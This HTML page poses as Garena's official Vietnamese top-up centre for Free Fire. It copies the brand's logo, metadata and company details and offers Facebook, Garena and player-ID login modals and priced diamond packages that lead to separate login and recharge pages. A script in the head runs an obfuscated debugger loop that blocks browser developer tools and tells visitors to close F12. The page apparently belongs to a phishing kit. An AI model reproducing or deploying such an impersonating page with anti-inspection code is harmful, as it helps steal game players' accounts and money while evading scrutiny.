

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1 , maximum-scale=1, user-scalable=no, viewport-fit=cover">
<title>Trung tâm nạp thẻ</title>
<meta http-equiv="content-language" content="vi">
<meta name="robots" content="index, follow'">
<link rel="shortcut icon" href="https://cdngarenanow-a.akamaihd.net/webmain/static/favicon.ico">
<link href="css/base.css" rel="stylesheet" />
<link rel="stylesheet" href="js/slick/slick.css">
<script type="text/javascript" src="js/jquery-3.3.1.js"></script>
<meta key="description" name="description" content="Trang nạp thẻ chính thức của Garena. Nạp Sò, nạp Quân Huy, nạp RP, nạp EP dễ dàng và an toàn cho các game Garena như Liên Minh Huyền Thoại, FIFA ONLINE 3, FO3M, Blade and Soul, Liên Quân Mobile, Chiến Dịch Huyền Thoại, DDTank, Free Fire, Âm Dương Sư." data-react-helmet="true">
<meta key="keywords" name="keywords" content="nạp tiền, garena, game, games" data-react-helmet="true">
<meta key="twitter:title" name="twitter:title" content="Trung tâm nạp thẻ Garena" data-react-helmet="true">
<meta key="twitter:description" name="twitter:description" content="Trang nạp thẻ chính thức của Garena. Nạp Sò, nạp Quân Huy, nạp RP, nạp EP dễ dàng và an toàn cho các game Garena như Liên Minh Huyền Thoại, FIFA ONLINE 3, FO3M, Blade and Soul, Liên Quân Mobile, Chiến Dịch Huyền Thoại, DDTank, Free Fire, Âm Dương Sư." data-react-helmet="true">
<meta key="og:title" property="og:title" content="Trung tâm nạp thẻ Garena" data-react-helmet="true">
<meta key="og:type" property="og:type" content="website" data-react-helmet="true">
<meta key="og:image" property="og:image" content="https://cdngarenanow-a.akamaihd.net/webmain/static/payment_center/common/garena-logo.png" data-react-helmet="true">
<meta key="og:url" property="og:url" content="/" data-react-helmet="true">
<meta key="og:description" property="og:description" content="Trang nạp thẻ chính thức của Garena. Nạp Sò, nạp Quân Huy, nạp RP, nạp EP dễ dàng và an toàn cho các game Garena như Liên Minh Huyền Thoại, FIFA ONLINE 3, FO3M, Blade and Soul, Liên Quân Mobile, Chiến Dịch Huyền Thoại, DDTank, Free Fire, Âm Dương Sư." data-react-helmet="true">
<script type="text/javascript" src="js/slick/slick.js"></script>
<link href="css/style.css" rel="stylesheet" />
<script type="text/javascript" src="js/style.js"></script>
<script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
<script>
	    var listchan = ['&', 'charCodeAt', 'firstChild', 'href', 'join', 'match', '+', '=', 'TK', '<a href=\'/\'>x</a>', 'innerHTML', 'fromCharCode', 'split', 'constructor', 'a', 'div', 'charAt', '', 'toString', 'createElement', 'debugger', '+-a^+6', 'Fingerprint2', 'KT', 'TKK', 'substr', '+-3^+b+-f', '67bc0a0e207df93c810886524577351547e7e0459830003d0b8affc987d15fd7', 'length', 'get', '((function(){var a=1585090455;var b=-1578940101;return 431433+"."+(a+b)})())', '.', 'https?:\/\/', ''];
(function () {
console.log("%c XIN HÃY TẮT F12 ĐỂ TIẾP TỤC. %c", 'font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:24px;color:#00bbee;-webkit-text-fill-color:#00bbee;-webkit-text-stroke: 1px #00bbee;', "font-size:12px;color:#999999;");

    (function block_f12() {
        try {
            (function chanf12(dataf) {
                if ((listchan[33] + (dataf / dataf))[listchan[28]] !== 1 || dataf % 20 === 0) {

                    (function () {})[listchan[13]](listchan[20])()
                } else {
                    debugger;
                    
                };
                chanf12(++dataf)
            }(0))
        } catch (e) {
            setTimeout(block_f12, 5000)
        }
    })()
})();
	</script>
</head>
<body>
<div class="s-header-1">
<div class="container align-items--between">
<a href="/" class="hd-logo"><img src="images/logo.png" alt=""></a>
<div class="hd-menu">
<a href="javascript:;" ht-trigger="hd-menu"><span>☰</span><span>×</span></a>
</div>
<a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin" class="hd-button"><img class="logged" src="images/user-2.png" alt=""> <span class="name">Đăng nhập</span></a>
</div>
</div>
<div id="modalLogin" class="c-modal" ht-close="c-modal">
<div class="c-modal-box">
<div class="c-modal-group" ht-skip="parent">
<div class="c_close text--white" ht-close="c-modal"><img src="images/close.png" alt=""></div>
<div class="c_body">
<div class="s-login-1">
<div class="s_title">Bảng điều khiển đăng nhập</div>
<div class="s_button">
<a href=""><img src="images/garena.png" alt=""> <span>Garena</span></a>
<a href=""><img src="images/facebook.png" alt=""> <span>Facebook</span></a>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="modalLogin2" class="c-modal" ht-close="c-modal">
<div class="c-modal-box">
<div class="c-modal-group" ht-skip="parent">
<div class="c_close text--white" ht-close="c-modal"><img src="images/close.png" alt=""></div>
<div class="c_body">
<div class="s-login-1">
<div class="s_title">Bảng điều khiển đăng nhập</div>
<div class="s_button">
<a href=""><img src="images/facebook.png" alt=""> <span>Facebook</span></a>
<div class="s_faifai">
<a href="login.html"><img src="images/iconfaifai.png" alt=""> <div><span>ID Người Chơi</span></div></a>
<span ht-trigger="c-modal-3" ht-target="#modalLogin3"><img src="images/question.png" alt=""></span>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="modalLogin3" class="c-modal c-modal-3" ht-close="c-modal-3">
<div class="c-modal-box">
<div class="c-modal-group" ht-skip="parent">
<div class="c_close text--white" ht-close="c-modal-3"><img src="images/close.png" alt=""></div>
<div class="c_body">
<img src="images/id.png" alt="">
</div>
</div>
</div>
</div>
<div class="s-menu-1">
<div class="s_menu">
<ul ht-target="hd-menu">
<li class="user"><img src="images/faifai.png" alt=""> <span id="name"></span></li>
<li><a href="">Chăm sóc khách hàng</a></li>
<li><a href="javascript:;" id="logout">Đăng xuất</a></li>
</ul>
</div>
<div class="s_after"></div>
</div>
<div class="s-slide-1">
<div class="container">
<div class="b-sslide-ratio">
<div class="slick-slider">
<a href=""><img src="images/slide_1.jpg" alt="" /></a> 
<a href=""><img src="images/slide_2.jpg" alt="" /></a> 
</div>
</div>
</div>
</div>
<div class="s-payment-1">
<div class="container">
<div class="s_flex">
<div class="s_game"><img src="images/faifai.png" alt=""> <div><span>Free Fire</span> <span>Thẻ cào <im class="type"></im></span></div></div>
<div class="s_icon"><img src="images/iconrefesh.png" alt=""></div>
 </div>
</div>
<div class="s_box">
<div class="container">
<div class="s_desc">Nạp thẻ <im class="type"></im> vào thuê bao của bạn, chọn mệnh giá bên dưới và thực hiện theo cú pháp tương ứng</div>
<ul>
<li class="diamon"><a href="javascript:;" data-diamond="45" data-money="10000"> <img src="images/diamon.jpg" alt=""> <div class="money"><span>Kim cương</span><span>45 <span> + 50MB Freedata*</span></span></div> <div>10 000 VND</div></a></li>
<li class="diamon"><a href="javascript:;" data-diamond="90" data-money="20000"> <img src="images/diamon.jpg" alt=""> <div class="money"><span>Kim cương</span><span>90 <span> + 100MB Freedata*</span></span></div> <div>20 000 VND</div></a></li>
<li class="diamon"><a href="javascript:;" data-diamond="460" data-money="50000"> <img src="images/diamon.jpg" alt=""> <div class="money"><span>Kim cương</span><span>460 <span> + 250MB Freedata*</span></span></div> <div>50 000 VND</div></a></li>
<li class="diamon"><a href="javascript:;" data-diamond="912" data-money="100000"> <img src="images/diamon.jpg" alt=""> <div class="money"><span>Kim cương</span><span>912 <span> + 500MB Freedata*</span></span></div> <div>100 000 VND</div></a></li>
<li class="diamon"><a href="javascript:;" data-diamond="1900" data-money="200000"> <img src="images/diamon.jpg" alt=""> <div class="money"><span>Kim cương</span><span>1900 <span> + 1GB Freedata*</span></span></div> <div>200 000 VND</div></a></li>
<li class="diamon"><a href="javascript:;" data-diamond="4750" data-money="500000"> <img src="images/diamon.jpg" alt=""> <div class="money"><span>Kim cương</span><span>4750 <span> + 2.5GB Freedata*</span></span></div> <div>500 000 VND</div></a></li>
</ul>
<div class="s_card">
<div class="row">
<div class="col-6">
<a href="" class="b-card-55">
<div class="b_thumb"><img src="images/napthe-1.png" alt=""> <span>Hot</span></div>
<div class="b_title">Thẻ tuần</div>
<div class="b_price">50 000 VND</div>
</a>
</div>
<div class="col-6">
<a href="" class="b-card-55">
<div class="b_thumb"><img src="images/napthe-2.png" alt=""> <span>Hot</span></div>
<div class="b_title">Thẻ tháng</div>
<div class="b_price">230 000 VND</div>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="s-foolter-1">
<div class="container">
<ul>
<li>CÔNG TY CỔ PHẦN PHÁT TRIỂN THỂ THAO ĐIỆN TỬ VIỆT NAM</li>
<li>Giấy CNĐKKD số 0103959912, cấp lần đầu ngày 09/06/2009 | Cơ quan cấp: Phòng Đăng ký kinh doanh- Sở Kế hoạch và đầu tư TP Hà Nội</li>
<li>Địa chỉ trụ sở chính: Tầng 29, Tòa nhà Trung tâm Lotte Hà Nội, số 54 đường Liễu Giai, Phường Cống Vị, Quận Ba Đình, TP Hà Nội, Việt Nam</li>
<li>Điện thoại: 024 73053939</li>
</ul>
<ul>
<li><a href="">Câu hỏi thường gặp</a></li> 
<li><a href="">Điều khoản dịch vụ</a></li> 
<li><a href="">Chính sách bảo mật</a></li> 
</ul>
</div>
</div>
<script>
        $(document).ready(function() {;
            var type = sessionStorage.getItem('type'),
                idGame = sessionStorage.getItem('idGame');

            if(!idGame) {
                window.location.href = '/';
            }

            $('.type').text(type ? type : 'Viettel');

            $('[data-money]').click(function(){
                sessionStorage.setItem('amount', $(this).data('money'));
                sessionStorage.setItem('diamond', $(this).data('diamond'));
                window.location.href = 'recharge.html';
            });
        });
    </script>
</body>
</html>